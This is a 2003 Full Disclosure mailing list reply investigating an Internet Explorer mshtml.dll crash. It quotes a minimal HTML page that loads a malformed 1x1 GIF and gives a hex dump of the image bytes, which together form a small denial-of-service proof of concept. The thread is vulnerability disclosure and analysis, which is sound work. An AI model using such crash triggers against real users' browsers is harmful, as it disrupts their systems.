Full Disclosure mailing list archives
Re: New Microsoft Internet Explorer mshtml.dll Denial of Service?
From: Tim <tim-security () sentinelchicken org>
Date: Tue, 2 Sep 2003 10:38:07 -0700
Interesting...
After a **lot** of html code "trimming" I came with an offline version of the page like this: ------------------------------------------------------ <html> <body> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1" alt=""></td> </tr> </table> </body> </html> ------------------------------------------------------- and this piece of code does crash my browser (6.0.2800.1106) on windows 2000 server all patches and fixes up to date. NOTE: Every time you **want** the browser to crash, you must delete it from the "Temporary Internet Files" before loading it in your browser. Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or unrecognized image header". Does this image, in some way, affects the way IE does the parsing? Seems like it...
Yeah, the GIF image is almost certainly mal-formed. Not sure in what way yet, as I am no GIF expert. Some interesting information though: Opening it in the GIMP produces the following errors on stderr: GIF: too much input data, ignoring extra... GIF: bogus character 0x00, ignoring The file's contents are: 00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF GIF89a.......... 00000010 FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00 ...!.......,.... 00000020 01 00 01 00 00 02 02 4C 01 00 3B .......L..; I then opened the file in the GIMP, and immediately saved it back to another gif file, and it wrote: 00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF GIF89a.......... 00000010 00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00 ...!.......,.... 00000020 01 00 01 00 00 00 01 01 00 3B .........; Which obviously has some differences. Anyone else better with GIF89a than I? tim _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- AW: New Microsoft Internet Explorer mshtml.dll Denial of Service? Pellmann Paul (Sep 02)
- RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? Tiago Halm (Sep 02)
- Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? Tim (Sep 02)
- Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? Tim (Sep 02)
- RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? nonleft (Sep 02)
- RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? Tiago Halm (Sep 02)
- RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? Steve Wray (Sep 02)
- Message not available
- Message not available
- Re: About Gif's Karl-Heinz Kreis (Sep 03)
- Message not available
- RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? Tiago Halm (Sep 02)